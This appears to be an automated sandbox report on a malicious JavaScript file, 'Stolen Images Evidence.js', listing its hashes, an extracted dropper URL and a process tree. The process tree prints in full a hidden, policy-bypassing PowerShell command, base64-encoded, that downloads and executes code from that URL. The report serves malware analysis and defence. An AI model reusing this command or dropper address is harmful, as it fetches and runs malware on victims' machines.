Analysis
-
max time kernel
8s -
max time network
11s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
27-07-2021 19:27
Static task
static1
Behavioral task
behavioral1
Sample
Stolen Images Evidence.js
Resource
win7v20210410
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Stolen Images Evidence.js
Resource
win10v20210408
windows10_x64
0 signatures
0 seconds
General
-
Target
Stolen Images Evidence.js
-
Size
23KB
-
MD5
86c4c4a86388ab87b8166563fc6080b9
-
SHA1
a22941692d34245363e1ed75a2e55f9e439f3e2d
-
SHA256
6961814b2c02d34f6eb8da26d59c3e555763f28680ed67bd7c6b30994dba74d3
-
SHA512
9005d46de018ce0409a2a8f0bd7afe611636c88e5f503b4d0e22ef72dbec7b0240a3f1c12b6711a07dc839d04225df5f3fcee4db8c68edf4eb8a58a7aef71ebc
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://munardis.space/222g100/index.php
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 1736 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1736 powershell.exe 1736 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1736 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
wscript.execmd.exedescription pid process target process PID 1116 wrote to memory of 1972 1116 wscript.exe cmd.exe PID 1116 wrote to memory of 1972 1116 wscript.exe cmd.exe PID 1116 wrote to memory of 1972 1116 wscript.exe cmd.exe PID 1972 wrote to memory of 1736 1972 cmd.exe powershell.exe PID 1972 wrote to memory of 1736 1972 cmd.exe powershell.exe PID 1972 wrote to memory of 1736 1972 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1116-60-0x000007FEFC301000-0x000007FEFC303000-memory.dmpFilesize
8KB
-
memory/1736-62-0x0000000000000000-mapping.dmp
-
memory/1736-64-0x00000000021F0000-0x00000000021F1000-memory.dmpFilesize
4KB
-
memory/1736-65-0x000000001AC10000-0x000000001AC11000-memory.dmpFilesize
4KB
-
memory/1736-66-0x00000000025D0000-0x00000000025D1000-memory.dmpFilesize
4KB
-
memory/1736-67-0x000000001AB90000-0x000000001AB92000-memory.dmpFilesize
8KB
-
memory/1736-68-0x000000001AB94000-0x000000001AB96000-memory.dmpFilesize
8KB
-
memory/1736-69-0x0000000002340000-0x0000000002341000-memory.dmpFilesize
4KB
-
memory/1736-70-0x000000001C410000-0x000000001C411000-memory.dmpFilesize
4KB
-
memory/1972-61-0x0000000000000000-mapping.dmp